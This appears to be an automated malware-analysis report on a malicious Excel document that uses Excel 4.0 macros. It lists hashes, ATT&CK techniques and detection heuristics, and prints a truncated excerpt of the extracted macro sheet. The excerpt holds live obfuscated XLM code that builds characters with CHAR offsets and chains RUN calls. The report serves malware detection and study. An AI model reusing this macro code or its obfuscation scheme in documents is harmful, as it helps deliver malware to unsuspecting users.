Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 01558388b33abe05…

MALICIOUS

Office (OOXML)

Size: 30.8 KB
Created: 2020-04-14 07:15:43 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-07-24
MD5: 0be6ece31de89f3efb4125e086416ffc
SHA-1: 01d3e9a0fe2a52bfd715012a623511029efe77ab
SHA-256: 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606
Risk score: 190

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an Excel document containing Excel 4.0 macros, indicated by the 'OOXML_XLM_MACROSHEET' and 'OOXML_XLM_AUTOOPEN_DEFINEDNAME' heuristics. The macros utilize dangerous functions like RUN, FORMULA, and CALL to execute arbitrary code, likely to download and run a second-stage payload. The document body displays a protection warning, a common lure to encourage users to enable macros.

Heuristics (5)

  • Excel 4.0 macro sheet (1 sheet(s)) [critical, 2 related findings] OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name [critical] OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: RUN, FORMULA, CALL, HALT [critical] OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Hidden worksheet (hidden) [low] OOXML_HIDDEN_SHEET
    Excel workbook contains 1 hidden sheet(s). Hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 76438 bytes
SHA-256: 86ebb6e57d5632d3682009c7fbe7da84cf68af87f604d4974fb1f4ab49ff3e6a

Preview script (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A5:IO1999"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="14" x14ac:dyDescent="0.3"/><sheetData><row r="5" spans="43:211" x14ac:dyDescent="0.3"><c r="FJ5" t="str"><f>CHAR($CW$1165-33)</f><v>e</v></c></row><row r="6" spans="43:211" x14ac:dyDescent="0.3"><c r="FJ6" t="b"><f>RUN($DF$76)</f><v>0</v></c></row><row r="7" spans="43:211" x14ac:dyDescent="0.3"><c r="ET7"><v>18</v></c></row><row r="9" spans="43:211" x14ac:dyDescent="0.3"><c r="HC9"><v>65</v></c></row><row r="11" spans="43:211" x14ac:dyDescent="0.3"><c r="AY11"><v>151</v></c></row><row r="12" spans="43:211" x14ac:dyDescent="0.3"><c r="FZ12"><v>7</v></c></row><row r="14" spans="43:211" x14ac:dyDescent="0.3"><c r="AQ14"><v>132</v></c><c r="FN14" t="b"><f>RUN($CN$1154)</f><v>0</v></c></row><row r="25" spans="51:51" x14ac:dyDescent="0.3"><c r="AY25"><v>13</v></c></row><row r="41" spans="88:191" x14ac:dyDescent="0.3"><c r="DI41" t="b"><f>RUN($GV$600)</f><v>0</v></c></row><row r="42" spans="88:191" x14ac:dyDescent="0.3"><c r="EB42"><v>7</v></c></row><row r="43" spans="88:191" x14ac:dyDescent="0.3"><c r="CJ43" t="str"><f>CHAR($HE$158-33)</f><v>R</v></c></row><row r="44" spans="88:191" x14ac:dyDescent="0.3"><c r="CJ44" t="b"><f>RUN($H$1937)</f><v>0</v></c></row><row r="47" spans="88:191" x14ac:dyDescent="0.3"><c r="GI47"><v>641</v></c></row><row r="50" spans="33:181" x14ac:dyDescent="0.3"><c r="CQ50"><v>135</v></c></row><row r="57" spans="33:181" x14ac:dyDescent="0.3"><c r="AG57"><v>26</v></c></row><row r="60" spans="33:181" x14ac:dyDescent="0.3"><c 
r="BV60"><v>21</v></c></row><row r="63" spans="33:181" x14ac:dyDescent="0.3"><c r="FY63" t="b"><f>RUN($DC$1871)</f><v>0</v></c></row><row r="65" spans="65:234" x14ac:dyDescent="0.3"><c r="BM65"><v>453</v></c></row><row r="66" spans="65:234" x14ac:dyDescent="0.3"><c r="BM66"><v>95</v></c></row><row r="71" spans="65:234" x14ac:dyDescent="0.3"><c r="CX71"><v>79</v></c><c r="FY71"><v>72</v></c></row><row r="75" spans="65:234" x14ac:dyDescent="0.3"><c r="EV75" t="b"><f>RUN($AF$103)</f><v>0</v></c></row><row r="77" spans="65:234" x14ac:dyDescent="0.3"><c r="EW77" t="b"><f>RUN($BQ$496)</f><v>0</v></c></row><row r="79" spans="65:234" x14ac:dyDescent="0.3"><c r="HZ79"><v>34</v></c></row><row r="83" spans="21:217" x14ac:dyDescent="0.3"><c r="EP83"><v>111</v></c></row><row r="90" spans="21:217" x14ac:dyDescent="0.3"><c r="HI90" t="str"><f>CHAR($H$1715-33)</f><v>d</v></c></row><row r="91" spans="21:217" x14ac:dyDescent="0.3"><c r="AP91"><v>48</v></c><c r="HI91" t="b"><f>RUN($IK$304)</f><v>0</v></c></row><row r="92" spans="21:217" x14ac:dyDescent="0.3"><c r="U92"><v>149</v></c></row><row r="95" spans="21:217" x14ac:dyDescent="0.3"><c r="DR95" t="str"><f>CHAR($I$1901-525)</f><v>\</v></c></row><row r="96" spans="21:217" x14ac:dyDescent="0.3"><c r="DJ96" t="str"><f>CHAR($EG$1840-33)</f><v>R</v></c><c r="DR96" t="b"><f>RUN($DL$1790)</f><v>0</v></c></row><row r="97" spans="2:114" x14ac:dyDescent="0.3"><c r="DJ97" t="b"><f>RUN($EH$307)</f><v>0</v></c></row><row r="101" spans="2:114" x14ac:dyDescent="0.3"><c r="B101" t="b"><f>RUN($HW$1263)</f><v>0</v></c></row><row r="103" spans="2:114" x14ac:dyDescent="0.3"><c r="AF103" t="b"><f>RUN($AK$1469)</f><v>0</v></c></row><row r="104" spans="2:114" x14ac:dyDescent="0.3"><c r="S104"><v>143</v></c></row><row r="106" spans="2:114" x14ac:dyDescent="0.3"><c r="CI106"><v>61</v></c></row><row r="108" spans="2:114" x14ac:dyDescent="0.3"><c r="AO108"><v>41</v></c></row><row r="117" spans="27:168" x14ac:dyDescent="0.3"><c r="AA117" 
t="str"><f>CHAR($CM$889-33)</f><v>E</v></c></row><row r="118" spans="27:1
... (truncated)